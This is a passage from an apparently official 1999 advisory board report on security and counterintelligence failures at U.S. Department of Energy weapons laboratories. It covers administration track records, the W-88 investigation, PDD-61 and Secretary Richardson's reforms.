The 1996 group also called for a Deputy Secretary–level review of foreign visits and assignments to be completed by June 1997.53 The PFIAB panel found no evidence to suggest that these tasks were accomplished. In 1997, GAO found that DOE lacked clear criteria for identifying visits that involve sensitive subjects; U.S. scientists may have discussed sensitive subjects with foreign nationals without DOE’s knowledge or approval; and the Department’s counterintelligence program had failed to produce comprehensive threat assessments that would identify likely facilities, technologies, and programs targeted by foreign intelligence.54 The study found that records checks were still not being conducted regularly on foreign visitors from sensitive countries.55

Last year, 7,600 foreign scientists paid visits to the weapons labs.56 Of that total, about 34 percent were from countries that are designated “sensitive” by the Department of Energy—meaning they represent a hostile intelligence threat. The GAO reported last year that foreign nationals had been allowed after-hours and unescorted access to buildings.57

Administration Track Records

CARTER (Schlesinger: Aug '77-Aug '79; Duncan: Aug '79-Jan '81)
- '77 DOE established
- First visiting U.S. scientists to China in '79 and '80 face Chinese elicitation effort.
- Late 1970s FBI investigates possible espionage at a lab.
- '80 GAO reports on problems safeguarding against the spread of nuclear weapons technology.

REAGAN I (Edwards: Jan '81-Nov '82; Hodel: Nov '82-Feb '85; Herrington: Feb '85- )
- '82 DOE's Inspection and Evaluation program formed
- GAO reports safeguards and security of weapons labs not adequate, recommends independent assessments program.
- '83 DOE issues threat guidance to provide a “consistent basis" for identifying vulnerabilities.
- Memo to DOE, DOD states President has "decided to strengthen WH role … concerning the security of U.S. nuclear facilities."
- President signs National Security Decision Directive (NSDD) on DOE security.
- DOE Safeguards and Security Steering Group formed at President's direction to oversee fulfillment of physical security improvements
- GAO reports security concerns at Rocky Flats facility.
- DOE conducts eight internal security inspections at weapons facilities and DOE HQ; provides criticisms and recommendations to DOE management.
- '84 DOE's Central Training Academy established for protective force personnel.

REAGAN II (Herrington: Feb '85-Jan '89)
- '86 Rep. Dingell letter to President re: lab security vulnerabilities, management problems and lack of confidence in DOE.
- Four GAO reports on DOE security and CI problems
- External report requested by DOE finds problems with management of foreign visitors and adequate security.
- '87 Three GAO reports on DOE highlight the transfer of technology to proliferating nations and inefficient security clearance program.
- Seven internal DOE security inspections criticize management and security practices in '87-'88.
- DOE initiates the Personnel Security Assurance Program (PSAP)
- DOE focuses on insider protection and strengthens classified document controls.
- Three DOE IG reports about security clearance problems from '86-'88.
- '88 Intelligence Community paper reflects concerns with international scientific exchanges at the DOE labs.
- President signs NSDD on Nuclear Weapons Safety, Security, and Control.
- FBI detailee to DOE cites inaccessibility to senior DOE managers.
- President states "Improved nuclear security is an important legacy for us to leave the next administration;" DOE official opines that Energy has done "essentially all that can be done against the outsider threat."
- Senate Intelligence Committee staff briefed on CI activities at labs.
- Four GAO reports address DOE security and counter-intelligence problems, including: major weaknesses in foreign visitor controls at labs, and foreign agents possibly gaining access to labs.

BUSH (Watkins: Mar '89-Jan '93)
- '89 New Secretary concerned about 1988 GAO criticism of DOE CI/security, defers DOE annual report on security until he reviews issue; NSC concurs.
- GAO finds insufficient control over weapons-related information and technology.
- '90 Four IG reports on security
- Secretary of Energy Advisory Board (SEAB) chartered
- Interagency CI group prepares assessment of intelligence threat to government facilities from visiting foreign nationals.
- GAO cites lack of clear, concise physical security standards and inconsistent material measurements at labs.
- Freeze Task Force critical of split management of classified and unclassified computer security; finds direction, coordination, conduct and oversight of safeguards and security activities throughout DOE warrant structural changes.
- External CI review highlights DOE's inability to manage comprehensive approach to foreign threat; inadequate oversight, control over secret document inventory; uncoordinated computer security responsibilities.
- '91 Four IG reports criticize security
- GAO reports property, classified document control problems at LLNL; 10,000 documents unaccounted; inability of DOE to track, monitor, and correct security deficiencies
- '87, '89, and '91 GAO reports foreign countries routinely obtaining unclassified but sensitive information that could assist nuclear programs.
- Memo to President highlights previous security problems at DOE, Secretary's efforts to fix the deficiencies.
- '92 Two IG reports on security
- SSCI-requested CI assessment finds DOE headquarters lacks authority to direct labs, CI resources, and current threat information.
- GAO cites weak internal security oversight controls; incomplete safeguards and security planning at DOE facilities.
- DOE Order on CI issued.
- DOE and FBI formalize relationship for conduct of CI activities.
- Internal security report to Secretary finds "personnel are seldom held responsible for their disregard, either intentional or unintentional, of security requirements."
- Another report finds "Problems in management and oversight represent the most significant weakness" for the Department…and "security systems continue to be plagued with potential single point failures."

ASSESSMENTS

RESPONSIBILITY

While cultural, structural, and historical problems have all figured into the management and security and counterintelligence failures of DOE, they should not be construed as an excuse for the deplorable irresponsibility within the agency, the pattern of inaction from those charged with implementation of policies, or the inconsistency of those in leadership positions. The panel identified numerous instances in which individuals were presented with glaring problems yet responded with foot–dragging, finger–pointing, bland reassurances, obfuscations, and even misrepresentations.

The record of inattention and “false start” reforms goes back to the beginning of DOE. There have been several Presidents; National Security Advisors, Energy Secretaries, Deputy Secretaries, Assistant Secretaries, and Lab Directors; scores of DOE Office Directors and Lab managers; and a multitude of Energy Department bureaucrats and Lab scientists who all must shoulder the responsibility and accountability. As noted above, severe lapses in the security of the nation’s most critical technology, data, and materials were manifest at the creation of the DOE more than 20 years ago. Many, if not most, of the problems were identified repeatedly. Still, reforms flagged amid a lack of discipline and accountability. The fact that virtually every one of those problems persisted—indeed, many of the problems still exist—indicates a lack of sufficient attention by every President, Energy Secretary, and Congress.
This determination is in no way a capitulation to the standard of “everyone is responsible, therefore no one is responsible.” Quite the contrary. Even a casual reading of the open–source reports on the Department’s problems presents one with a compelling narrative of incompetency that should have merited the aggressive action of the nation’s leadership. Few transgressions could violate the national trust more than inattention to one’s direct responsibility for controlling the technology of weapons of mass destruction.

The PFIAB panel was not empowered, nor was it charged, to make determinations of whether specific acts of espionage or malfeasance occurred regarding alleged security lapses at the weapons labs. Nor was it tasked to issue performance appraisals of the various Presidents, Energy Secretaries, or members of the Congressional leadership during their respective terms in office. However, an inquiry into the extent to which the system of administrative accountability and responsibility broke down at various times in history has been necessary to fulfill our charter. In fairness, we have tried to examine the nature of the security problems at DOE’s weapons labs in many respects and at many levels, ranging from the circumstances of individuals and the dynamics of group behavior to the effectiveness of mid–level management, the clarity of the laws and regulations affecting the Department, and the effectiveness of leadership initiatives.

THE RECORD OF THE CLINTON TEAM

To its credit, in the past two years the Clinton Administration has proposed and begun to implement some of the most far–reaching reforms in DOE’s history. The 1998 Presidential Decision Directive on DOE counterintelligence (PDD-61) and Secretary Richardson’s initiatives are both substantial and positive steps. We offer an analysis of some of these initiatives, and their likelihood of success, elsewhere in this chapter and elsewhere in this report.
However, the speed and sweep of the Administration’s ongoing response does not absolve it of its responsibility in years past. At the outset of the Clinton Administration—in 1993, when it inherited responsibility for DOE and the glaring record of mismanagement of the weapons laboratories—the incoming leadership did not give the security and counterintelligence problems at the labs the priority and attention they warranted. It will be incumbent on the DOE transition team for the incoming administration in 2001 to pay particular heed to these issues.

While the track record of previous administrations’ responses to DOE’s problems is mixed (see box on previous administrations, on pp. 26-27), the panel members believe that the gravity of the security and counterintelligence mismanagement at the Department will, and should, overshadow post facto claims of due diligence by any administration—including the current one. Asserting that the degree of failure or success with DOE from one administration to the next is relative is, one might say, gilding a figleaf. The fact is that each successive administration had more evidence of DOE’s systemic failures in hand: the Reagan Administration arrived to find several years’ worth of troubling evidence from the Carter, Ford, and Nixon years; the evidence had mounted higher by the time that the Bush Administration took over; and higher still when the Clinton Administration came in. The Clinton Administration has acted forcefully, but it took pressure from below and outside the Administration to get the attention of the leadership, and there is some evidence to raise questions about whether its actions came later than they should have, given the course of events that led to the recent flurry of activity.

Clinton Administration Track Record

O’Leary: Jan ’93–Jan ’97
- ’93 New Secretary works to make labs more open…launches major declassification effort.
- DOE ’92 Annual Report to President does not mention security problems highlighted same year in reports to Secretary.
- GAO criticizes DOE’s ineffective management of personnel security cases.
- Four IG reports on security
- Internal report to Secretary on computer security uncovers lack of access controls; no configuration management; failure to perform management reviews.
- ’94 Three IG reports on security
- FBI detailees to DOE recalled because of “lack of control of the CI program by DOE HQ.”
- Internal report finds classified and unclassified information on lab computer network.
- GAO reports computer security deficiencies found in 1985 at six facilities still not fixed.
- ’95 Four IG reports on security
- Congress considers numerous bills between ’95–’99 to abolish DOE.
- “Galvin Task Force” offers SEAB options for change within the labs.
- “Walk-in” provides documents containing sensitive U.S. nuclear information.
- DOE officials meet with FBI regarding potential espionage involving nuclear weapons data.
- Analysis group formed at DOE to review Chinese weapons program; senior DOE, CIA, White House officials discuss options.
- GAO reports on poor management of nuclear material tracking capabilities
- Laboratory Operations (oversight) Board created.
- ’96 First three lab-to-lab exchanges between U.S. and China.
- Internal DOE report discovers required nuclear material physical inventories not being performed.
- Two IG reports on security
- DOE Deputy Secretary directs six “initiatives” to lab directors and field office heads for the foreign visitors and CI programs (most initiatives ignored after he leaves DOE in 1997.)

Pena: Mar ’97–Jun ’98
- ’97 Mar New Secretary confirmed.
- FBI report to Congress and DOE critical of DOE CI capabilities; addresses CI program oversight, foreign visits and assignments, CI analysis, professional training/CI awareness.
- FBI Director personally delivers CI review to Secretary.
- Two additional Lab–to–Lab exchanges held in Beijing.
- DOE staff briefs Congressional staff, and NSC, CIA, FBI senior officials on Chinese nuclear program, possible Chinese espionage before Secretary informed
- DOE increases budget for CI in FY 1997, hires more CI professionals.
- Inter-agency Working Group reports that systemic and serious CI and security problems at DOE have been well documented over at least a ten year period … few of the recommendations in the past studies have been implemented …
- A senior CI official states “There is every reason to believe the labs will resist” any outside assistance
- National Security Advisor requests independent assessment of China's nuclear program and the impact of U.S. nuclear information.
- Two DOE internal reports cite confusing, fragmented, dysfunctional security management structure.
- External report finds multiple, uncoordinated internal and external oversight activities.
- DCI and FBI Director meet with Secretary to discuss DOE CI problem and reform plan; meeting notes state “Despite all the studies conducted, experience over time has shown that DOE’s structure and culture make reform difficult, if not impossible, from within.”
- Internal DOE report states “in all candor, we have been hampered in meeting [the safeguards and security] obligations by organizational obstacles and competing internal interests.”
- PDD–61 drafted, coordinated in inter-agency process.
- DOE’s Laboratory Operations Board finds “inefficiencies due to the Department's complicated management structure.”
- Peter Lee (formerly of LLNL) pleads guilty, inter alia, to transmitting classified national defense information to representatives of the PRC in ’85.
- GAO finds faulty procedures for foreign visitor indices checks and controlling dissemination of sensitive information; lack of clear criteria for identifying visits that involve sensitive subjects; indirect and inconsistent CI funding; DOE CI programs not based on comprehensive assessment of foreign espionage threat.
- Institute of Defense Analyses’ “120 Day Report” finds inadequate management of DOE workforce and confusing chains of command.
- ’98 Feb. President signs PDD-61.
- External report says DOE management and oversight of security problematic
- Security Management Board created by Congress, meets twice in next 18 months
- CIA/FBI report provided to Congress on Chinese espionage activities.
- Jun 30 Secretary resigns, Deputy designated as Acting Secretary.
- DOE’s 90-day report on CI reveals problems remain regarding separate management of classified and unclassified information.
- Lab-to-lab exchange held in Beijing.

Richardson: Aug ’98 –
- ’98 Aug 18 New Secretary sworn in
- GAO again finds problems in DOE’s foreign visitor program; notes lack of clear procedures for identifying sensitive subjects.
- External report highlights lack of DOE oversight expertise and ad hoc security structure.
- Per PDD–61, assessment of the foreign collection threat against DOE published.
- '99 DOE security review finds “unhealthy, adversarial environment of mistrust among DOE security organizations,” recommends several management process changes
- Cox Committee publishes report
- Lab-to-Lab exchange held in Beijing.
- President directs PFIAB to review security, CI at labs; directs Intelligence Community to conduct damage assessment of possible security breaches at labs; directs CI community to review security of nuclear weapons information in USG.
- DOE CI Implementation Plan delivered to Secretary.
- GAO reports inadequate separation of classified and unclassified computer networks at same lab in 1988, 1992, 1994, and 1998.
- “Chiles Report” describes management problems in nuclear weapons program.
- Internal DOE report highlights computer security problems at a lab.
- DOE counterintelligence implementation plan (per PDD–61) issued to labs.
- DOE shuts down all classified computers at LANL, LLNL, and SNL.
- DOE holds tri-lab computer security conference.
- Secretary announces new security organization at DOE, to be headed by a “security czar.”

THE 1995 ‘WALK-IN’ DOCUMENT

In 1995, a U.S. intelligence agency obtained information that has come to be called the “walk-in” document. A copy of a classified PRC report, it contains a discussion of various U.S. nuclear warheads. The PFIAB has carefully reviewed this document, related information, and the circumstances surrounding its delivery. Serious questions remain as to when it was written, why it was written, and why it was provided to the U.S. We need not resolve these questions. The document unquestionably contains some information that is still highly sensitive, including descriptions, in varying degrees of specificity, of technical characteristics of seven U.S. thermonuclear warheads. This information had been widely available within the U.S. nuclear weapons community, including the weapons labs, other parts of DOE, the Department of Defense, and private contractors, for more than a decade. For example, key technical information concerning the W–88 warhead had been available to numerous U.S. government and military entities since at least 1983 and could well have come from many organizations other than the weapons labs.

W-88 INVESTIGATION

Despite the disclosure of information concerning seven warheads, despite the potential that the source or sources of these disclosures were other than the bomb designers at the national weapons labs, and despite the potential that the disclosures occurred as early as 1982, only one investigation was initiated. That investigation focused on only one warhead, the W–88, only one category of potential sources—bomb designers at the national labs—and on only a four-year window of opportunity. It should have been pursued in a more comprehensive manner. The allegations raised in the investigation should still be pursued vigorously. And the inquiry should be fully explored—regardless of the conclusions that may result.
The episode began as an administrative inquiry conducted by the DOE Office of Energy Intelligence, with limited assistance from the FBI. It developed into an FBI investigation, which is still under way today. Allegations concerning this case and related activities highlighted the need for improvements in the DOE’s counterintelligence program, led along the way to the issuance of a Presidential Decision Directive revamping the DOE’s counterintelligence program, formed a substantial part of the information underlying the Cox Committee’s conclusions on nuclear weapons information, and ultimately led, at least in part, to the President’s decision to ask this Board to evaluate security and counterintelligence at the DOE’s weapons labs.

It is not within the mandate of our review to solve the W–88 case or any other potential compromises of nuclear weapons information. Further, it is not within our mandate to conduct a comprehensive and conclusive evaluation of the handling of the W–88 investigation by the DOJ and FBI. In fact, as we understand it, that is the purpose of a task force recently appointed by the Attorney General. We trust that among the issues that the task force will resolve are:

- Whether the FBI committed sufficient resources, including agents with appropriate expertise, and demonstrated a sense of urgency commensurate with an apparent compromise of classified U.S. nuclear weapons information;
- Whether the DOJ Office of Intelligence Policy Review (OIPR) applied an inappropriately high standard to the FBI’s request for electronic surveillance under the Foreign Intelligence Surveillance Act (FISA);
- Whether the FBI provided to DOJ OIPR all U.S. government information relevant to an appropriate evaluation of the FBI’s FISA request;
- Why the FBI’s FISA request did not include a request to monitor or search the subject’s workplace computer systems, particularly since an attorney in the FBI’s General Counsel Office had provided an opinion in 1996 that such monitoring or searching in this case would require FISA authorization;
- Why the FBI did not learn until recently that in 1995 the subject had executed a series of waivers authorizing monitoring of his workplace computer systems;
- Whether the FBI adequately raised to the Attorney General the FBI’s concerns over the declination of the FISA request;
- Whether communications regarding the subject’s job tenure broke down between DOE, FBI, and Los Alamos;
- Whether the DOJ OIPR maintained appropriate records concerning FISA requests that were declined;
- Whether the FBI appropriately relied on technical opinions provided by the DOE;
- Why DOE, rather than the FBI, conducted the first polygraph examination in this case when the case was an open FBI investigation; and, perhaps most importantly,
- Whether additional cases should be opened to investigate whether the apparent disclosures may have arisen out of organizations other than Los Alamos lab.

Again, resolving these issues is not within our mandate. It is, however, explicitly within our mandate to identify additional steps that may need to be taken to address the security and counterintelligence threats to the weapons labs. Also, it is within our standing PFIAB obligation under Executive Order 12863 to assess the adequacy of counterintelligence activities beyond the labs. In this regard, what we have learned from our limited review of the W-88 case and other cases are significant lessons that extend well beyond these particular cases. These lessons relate directly to additional steps we believe must be taken to strengthen our safeguards against current security and foreign intelligence threats.
Those steps are discussed further in the Classified Appendix to this report. We have learned, for example, that under the current personnel security clearance system a person who is under FBI investigation for suspected counterintelligence activities may sometimes be granted a new or renewed clearance. We also have learned that although the written standards for granting a first clearance and for renewing an existing clearance may be identical, the actual practice that has developed—certainly within DOE and we strongly suspect elsewhere—is that clearance renewals will be granted on a lower standard. We find such inconsistency unacceptable. We think it appropriate for the National Security Council to review and resolve these issues.

We have also learned that the legal weapons designed to fight the counterintelligence battles of the 70s have not necessarily been rigorously adapted to fight the counterintelligence battles of the 90s (and beyond). For example, with the passage of more than twenty years since the enactment of the Foreign Intelligence Surveillance Act (FISA) of 1978, it may no longer be adequate to address the counterintelligence threats of the new millennium. We take no position on whether the statute itself needs to be changed. It may well still be sufficient. However, based on all of the information we have reviewed and the interviews we have conducted, and without expressing a view as to the appropriateness of the DOJ decision in the W–88 case, we do believe that the Department of Justice may be applying the FISA in a manner that is too restrictive, particularly in light of the evolution of a very sophisticated counterintelligence threat and the ongoing revolution in information systems. We also are concerned by the lack of uniform application across the government of various other investigative tools, such as employee waivers that grant officials appropriate authority to monitor sensitive government computer systems.
Moreover, there does not exist today a systematic process to ensure that the competing interests of law enforcement and national security are appropriately balanced. Law enforcement, rightly so, is committed to building prosecutable cases. This goal is often furthered by leaving an espionage suspect in place to facilitate the gathering of more evidence. The national security interest, in contrast, is often furthered by immediately removing a suspect from access to sensitive information to avoid additional compromises. Striking the proper balance is never easy. It is made all the more difficult when there is no regular process to ensure that balance is struck. We have learned in our review that this difficult decision often is made by officials who either are too focused on the investigative details or are too unaware of the details to make a balanced decision. This is another matter deserving National Security Council attention.

PFIAB EVALUATION OF THE INTELLIGENCE COMMUNITY DAMAGE ASSESSMENT

Following receipt of the “walk-in” document, CIA, DOE, Congress, and others conducted numerous analyses in an effort to determine the extent of the classified nuclear weapons information the PRC has acquired and the resultant threat to U.S. national security. Opinions expressed in the media and elsewhere have ranged from one extreme to the other. On one end of the spectrum is the view that the Chinese have acquired very little classified information and can do little with it. On the other end is the view that the Chinese have nearly duplicated the W–88 warhead. After reviewing the available intelligence and interviewing the major participants in many of these studies, we conclude that none of these extreme views holds water. For us, the most accurate assessment of China’s acquisition of classified U.S. nuclear weapons information and the resultant threat to U.S. national security is presented in the April 1999 Intelligence Community Damage Assessment. Written by a team of experts, this assessment was reviewed and endorsed by an independent panel of national security and nuclear weapons specialists, chaired by Admiral David Jeremiah. We substantially agree with the assessment’s analysis and endorse its key findings. The full text of the assessment’s unclassified summary appears in the unclassified appendix.

PRESIDENTIAL DECISION DIRECTIVE 61: BIRTH AND INTENT

In mid–1997, it became clear to an increasingly broader range of senior administration officials that DOE’s counterintelligence program was in serious trouble.1 In late July, DOE officials briefed the President’s National Security Advisor, who concluded that, while the real magnitude and national security implications of the suspected espionage needed closer scrutiny, there was nonetheless a solid basis for taking steps to strengthen counterintelligence measures at the labs. He requested an independent CIA assessment of China’s nuclear program and the impact of U.S. nuclear information, and he directed that the National Counterintelligence Policy Board (NACIPB)2 review the DOE counterintelligence program. That September, the National Security Advisor received the CIA assessment, and the NACIPB reported back that it had found “systemic and serious CI and security problems at DOE [had] been well documented over at least a ten year period” and “few of the recommendations in the past studies [had] been implemented.” The NACIPB made 25 recommendations to significantly restructure the DOE CI program; it also proposed that a Presidential Decision Directive or Executive Order be handed down to effect these changes.

At an October 15 meeting, the Director of Central Intelligence and the FBI Director discussed with Secretary Pena and his Deputy Secretary the need to reform the DOE CI program. The DCI and FBI Director sought to make clear there was an urgent need to act immediately, and “despite all the studies conducted, experience over time [had] shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” All agreed to develop an action plan that would serve as the basis for a Presidential Decision Directive. Several senior officials involved felt that the necessary reforms would—without the mandate of a Presidential directive—have little hope of overcoming the anticipated bureaucratic resistance, both at DOE headquarters and at the labs. There was a clear fear that, “if the Secretary spoke, the bureaucracy wouldn’t listen; if the President spoke, the bureaucracy might at least listen.”

That winter, the NSC coordinated a draft PDD between and among the many agencies and departments involved. Serious disagreements arose over several issues, particularly the creation of independent reporting lines to the Secretary for the Intelligence and Counterintelligence Offices. Also at issue was the subordination of the CI officers at the labs. Much of the resistance stemmed simply from individuals interested in preserving their turf won in previous DOE bureaucratic battles. After much bureaucratic maneuvering and even vicious in–fighting, these issues were finally resolved, or so it seemed; and on February 11, 1998, the President signed and issued the directive as PDD-61. The full PDD remains classified. An unclassified summary, which contains all significant provisions, is set forth in the unclassified annex.
In our view, among the most significant of the 13 initiatives directed by PDD-61 are: The CI and foreign intelligence (FI) elements would be reconfigured into two independent offices and report directly to the Secretary of Energy; The Director of the new Office of CI (OCI) would be a senior executive from the FBI and would have direct access to the Secretary of Energy, the DCI and the Director of the FBI; Existing DOE contracts with the labs would be amended to include CI program goals and objectives and performance measures to evaluate compliance with these contractual obligations, and CI personnel assigned to the labs would have direct access to the lab directors and would concurrently report to the Director, OCI; The incoming Director, OCI would prepare a report for the Secretary of Energy ninety days after his arrival that would address progress on the initiative, a strategic plan for achieving long-term goals, and recommendations on whether and to what extent other organizational changes may be necessary to strengthen CI; and, Within 120 days, the Secretary of Energy would advise the Assistant to the President for National Security Affairs on the actions taken and specific remedies designed to implement this directive. On April 1, 1998, a senior executive from the FBI assumed his duties as the Director of the OCI, and began his 90–day study. He completed and forwarded it to the Secretary of Energy on July 1, the day after Secretary Pena resigned. The Acting Secretary led a review of the study and its recommendations. On August 18, Secretary Richardson was sworn in. On November 13, he submitted the action plan required by the PDD to the National Security Advisor. Secretary Richardson continued to develop an implementation plan. The completed implementation plan was delivered to Secretary Richardson on February 3, 1999, and issued to the labs on March 4. 
TIMELINESS OF PDD–61

Criticism has been raised that the PDD took too long to be issued and has taken too long to implement. Although the current National Security Advisor was briefed on counterintelligence concerns by DOE officials in April of 1996, we are not convinced that the briefing provided a sufficient basis to require initiation of a broad Presidential directive at that time. We are convinced, however, that the July 1997 briefing, which we are persuaded was much more comprehensive, was sufficient to warrant aggressive White House action. We believe that while the resulting PDD was developed and issued within a customary amount of time, these issues had such national security gravity that it should have been handled with more dispatch. That there were disagreements over various issues is not surprising; that the DOE bureaucracy dug in its heels so deeply in resisting clearly needed reform is very disturbing. In fact, we believe that the NACIPB, created by PDD in 1994, was a critical factor in ram–rodding the PDD through to signature. Before 1994, there was no real structure or effective process for handling these kinds of issues in a methodical way. Had the new structure not been in place and working, we doubt if the PDD would have made it.

With regard to timeliness of implementation, we have far greater concern. It is not unreasonable to expect that senior DOE officials would require some time to evaluate the new OCI Director’s 90–day study, and we are aware that Secretary Richardson did not assume his DOE duties until mid–August. However, we find unacceptable the more than four months that elapsed before DOE advised the National Security Advisor on the actions taken and specific remedies developed to implement the Presidential directive, particularly one so crucial. More critically, we are disturbed by bureaucratic foot–dragging and even recalcitrance that ensued after issuance of the Presidential Decision Directive. Severe disagreements erupted over several issues, including whether the CI program would apply to all of the labs, not just the weapons labs, and the extent to which polygraph examinations would be used in the personnel security program. We understand that some DOE officials declined to assist in the implementation simply by declaring that, “It won’t work.” The polygraph program was finally accepted into the DOE’s security reforms only after the National Security Advisor and the DCI personally interceded. The fact that the Secretary’s implementation plan was not issued to the labs until more than a year after the PDD was issued tells us DOE is still unconvinced of Presidential authority. We find worrisome the reports of repeated and recent resistance by Office of Management and Budget officials to requests for funding to implement the counterintelligence reforms mandated by PDD-61. We find vexing the reports we heard of OMB budgeteers lecturing other government officials on the “unimportance” of counterintelligence at DOE.

SECRETARY RICHARDSON’S INITIATIVES

Since November of 1998 and especially since April of this year, Secretary Richardson has taken commendable steps to address DOE’s security and counterintelligence deficiencies. In November of last year, in the action plan required by PDD-61, Secretary Richardson detailed 31 actions to be taken to reform DOE’s counterintelligence program. These actions addressed the structure of the counterintelligence program, selection and training of field counterintelligence personnel, counterintelligence analysis, counterintelligence and security awareness, protections against potential “insider threats,” computer security, and relationships with the FBI, the Central Intelligence Agency, and the National Security Agency. Though many matters addressed in the action plan would require further evaluation before specific actions would be taken, immediate steps included granting to the Office of Counterintelligence (OCI) direct responsibility for programming and funding counterintelligence activities of all DOE field offices and laboratories; granting the Director, OCI the sole authority to propose candidates to serve as the counterintelligence officers at the weapons labs; and instituting a policy for a polygraph program for employees with access to sensitive information.

In April of 1999, in an effort to eliminate multiple reporting channels and improve lines of communications, direction and accountability, Secretary Richardson ordered changes in the department’s management structure. In short, each of the 11 field offices reports to a Lead Program Secretarial Office (LPSO). The LPSO has “overall line accountability for site-wide environment, safety and health, for safeguards and security and for the implementation of policy promulgated by headquarters staff and support functions.” A newly established Field Management Council is to be charged with program integration.

In May of 1999, Secretary Richardson announced substantial restructuring of the security apparatus at DOE. Among these is the new Office of Security and Emergency Operations, responsible for all safeguards and security policy, cyber–security, and emergency functions throughout DOE. It will report directly to the Secretary and consist of the Office of the Chief Information Officer, an Office of Emergency Management and Response, and an Office of Security Affairs, which will include the Office of Safeguards and Security, the Office of Nuclear and National Security Information, the Office of Foreign Visits and Assignments, and the Office of Plutonium, Uranium, and Special Material Inventory. Also announced was the creation of the Office of Independent Oversight and Performance Assurance. It also will report directly to the Secretary to provide independent oversight for safeguards and security, special nuclear materials accountability, and other related areas.

To support additional cyber-security improvements, DOE will be asking Congress for an additional $50 million over the next two years. Improvements are to include continual monitoring of DOE computers for unauthorized and improper use. New controls will also be placed on computers and workstations, removable media, removable drives, and other devices that could be used to download files. In addition, warning “banners” are now mandatory on all computer systems to alert users that these systems are subject to search and review at the government’s discretion. Cyber–security training is also to be improved.

Secretary Richardson further announced additional measures designed to strengthen DOE’s counterintelligence program. They include: a requirement that DOE officials responsible for maintaining personnel security clearances be notified of any information that might affect the issuance or maintenance of such a clearance, even when the information does not rise to the level of a criminal charge; and mandatory reporting by all DOE employees of any substantive contact with foreign nationals from sensitive countries. DOE also plans to strengthen its Security Management Board; accelerate actions necessary to correct deficiencies in security identified in the 1997/1998 Annual Report to the President on Safeguards and Security; expedite improvements in the physical security of DOE nuclear weapons sites; and delay the automatic declassification of documents more than 25 years old.

In sum, as of mid-June of 1999, progress has been made in addressing counterintelligence and security. Of note, all of the PDD–61 requirements are reported to have been substantially implemented. Other important steps also reportedly have been completed.
Among these are the assignment of experienced counterintelligence officers to the weapons labs.

PROSPECTS FOR REFORMS

Although we applaud Secretary Richardson’s initiative, we seriously doubt that his initiatives will achieve lasting success. Though certainly significant steps in the right direction, Secretary Richardson’s initiatives have not yet solved the many problems. Significant objectives, all of which were identified in the DOE OCI study completed nearly a year ago, have not yet been fully achieved. Among these unmet objectives are revising the DOE policy on foreign visits and establishing an effective polygraph examination program for selected, high–risk programs.

Moreover, the Richardson initiatives simply do not go far enough. These moves have not yet accomplished some of the smallest fixes—despite huge levels of attention and Secretarial priority. Consider the following example: with all the emphasis of late on computer security, including a weeks–long stand–down of the weapons labs computer systems directed by the Secretary, the stark fact remains that, as of the date of this report, a nefarious employee can still download secret nuclear weapons information to a tape, put it in his or her pocket, and walk out the door. Money cannot really be the issue. The annual DOE budget is already $18 billion. There must be some other reason.

Under the Richardson plan, even if the new “Security Czar” is given complete authority over the more than $800 million ostensibly allocated each year to security of nuclear weapons-related functions in DOE, he will still have to cross borders into other people’s fiefdoms, causing certain turmoil and infighting. If he gets no direct budget authority, he will be left with little more than policy guidance. Even then, as the head of a staff office, under the most recent Secretary Richardson reorganization he has to get the approval of yet another fiefdom, the newly created Field Management Council, before he can issue policy guidance. Moreover, he is unlikely to have much success in obtaining approval from that body when he is not even a member—and the majority of those who are members are the very program managers that his policy guidance would affect.

TROUBLE AHEAD

Perhaps the most troubling aspect of the PFIAB’s inquiry is the evidence that the lab bureaucracies—after months at the epicenter of an espionage scandal with serious implications for U.S. foreign policy—are still resisting reforms. Equally disconcerting, other agencies have joined the security skeptics list. In the past few weeks, officials from DOE and other agencies have reported to us:

- There is a heightened attention to security at the most senior levels of DOE and the labs, but at the mid–level tiers of management there has been lackluster response and “business as usual.”
- Unclassified but sensitive computer networks at several weapons labs are still riddled with vulnerabilities.
- Buildings that do not meet DOE security standards are still being used for open storage of weapons parts.
- Foreign nationals—some from sensitive countries—residing outside a weapons lab have remote dial-up access to unclassified networks without any monitoring by the lab.
- In an area of a weapons lab frequented by foreign nationals, a safe containing restricted data was found unsecured. It had not been checked by guards since August 1998. When confronted with the violation, a mid–level official is said to have implied that it was not an actual security lapse because the lock had to be “jiggled” to open the safe door.
- A weapons lab was instructed to monitor its outgoing email for possible security lapses. The lab took the minimal action necessary; it began monitoring emails but did not monitor the files attached to emails.
- When Secretary Richardson ordered the recent computer stand-down, there was great resistance, and when it came time to decide if the labs’ computers could be turned on again, a bevy of DOE officials fought to have final approval power.

BACK TO THE FUTURE

In 1976, federal officials conducted a study of the nation’s nuclear weapons laboratories and plants. In trying to devise a coherent and viable way of managing the labs, they settled on three possible solutions: place the weapons labs under the Department of Defense, make them a free–standing agency, or leave them within the Energy Research and Development Administration. Congress chose to leave the weapons labs within ERDA, the successor agency of the Atomic Energy Commission.

Nearly a decade later, the oversight of the weapons labs was still of great concern. Senators Sam Nunn and John Warner led a push to place the weapons labs under the auspices of the Department of Defense. However, the Reagan Administration staved off their effort by agreeing to put together a blue–ribbon panel to study the issue. The panel studied the problem for six months and issued a report in July, 1985. Again, Congress and federal officials weighed whether the weapons labs should be transferred to the Department of Defense or restructured to be given more autonomy. The status quo prevailed. The weapons labs stayed within the Department of Energy.

As this report has detailed, problems in the managerial relationship between DOE and the weapons labs have persisted, perhaps even increased, over the past 14 years. Indeed, the discussion today sounds hauntingly familiar to the discussions in the 1980s and 1970s. Today, however, there is a difference. The record of mismanagement of the weapons labs in matters of security and counterintelligence has become so long and so compelling as to demand a rejection of the status quo. There can be no doubt that the current structure of the Department of Energy has failed to give the nation’s weapons laboratories the level of care and attention they warrant. Thus, our panel is recommending deep and lasting structural change that will give the weapons laboratories the accountability, clear lines of authority, and priority they deserve.

REORGANIZATION

What makes a government agency run well? There are a multitude of characteristics that arguably can make for an efficient and effective government agency or department. This Panel holds no illusions about the completeness of its understanding nor the purity of its wisdom regarding government bureaucracies. Indeed, some people would say that truly comprehending the inner workings of a federal department is the intellectual equivalent of grasping the enormity of the universe. Over the course of many years, however, we, as members of the President’s Foreign Intelligence Advisory Board, have evaluated the performance of numerous federal entities, from the Department of Defense to the Foreign Broadcast Information Service. Some, we found, were in good order, others in pretty bad shape. In that sense, we believe we do know a lot about what makes some agencies work and not work. Although somewhat subjective and by no means exhaustive, our list of “good” things to look for includes several attributes.

LEADERSHIP

